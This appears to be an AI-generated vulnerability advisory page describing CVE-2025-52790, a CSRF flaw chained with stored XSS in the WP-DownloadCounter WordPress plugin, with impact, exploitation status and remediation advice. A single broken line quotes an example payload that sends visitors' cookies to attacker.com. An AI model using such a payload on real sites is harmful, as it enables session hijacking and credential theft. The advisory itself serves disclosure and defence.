
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52790 is a Cross-Site Request Forgery (CSRF) vulnerability in the WP-DownloadCounter WordPress plugin (by r-win) that enables Stored Cross-Site Scripting (XSS). It affects all versions of the plugin up to and including version 1.01. The vulnerability was published on June 20, 2025, and carries a CVSS v3.1 base score of 7.1 (High) (Red Hat CVE).
The vulnerability is classified under CWE-352 (Cross-Site Request Forgery). The plugin fails to implement adequate CSRF protections on sensitive administrative endpoints, allowing an attacker to craft a malicious request that, when triggered by an authenticated administrator visiting an attacker-controlled page, submits forged requests on their behalf. This CSRF vector is chained with a Stored XSS condition, meaning the forged request can inject persistent malicious scripts into the WordPress site's database, which are then executed in the browsers of subsequent visitors or administrators (Red Hat CVE).
Successful exploitation allows an attacker to persistently inject arbitrary JavaScript into the WordPress site, affecting all users who subsequently visit the compromised pages. This can lead to session hijacking, credential theft, defacement, or redirection of visitors to malicious sites. The changed scope (S:C) in the CVSS vector indicates that the impact extends beyond the plugin itself to the broader WordPress environment and its users (Red Hat CVE).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-52790 as of the available data. The vulnerability requires user interaction — specifically, an authenticated WordPress administrator must be tricked into visiting a malicious page or clicking a crafted link. The EPSS score is approximately 0.015%, indicating a very low probability of exploitation in the near term. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a plugin configuration field.The primary remediation is to update the WP-DownloadCounter plugin beyond version 1.01 once a patched release is made available by the plugin author (r-win). If no patch is currently available, site administrators should consider deactivating and removing the plugin until a fix is released. Additionally, implementing a Web Application Firewall (WAF) with CSRF and XSS rules can provide interim protection. Administrators should also ensure that privileged WordPress accounts follow safe browsing practices to reduce the risk of CSRF-based attacks (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."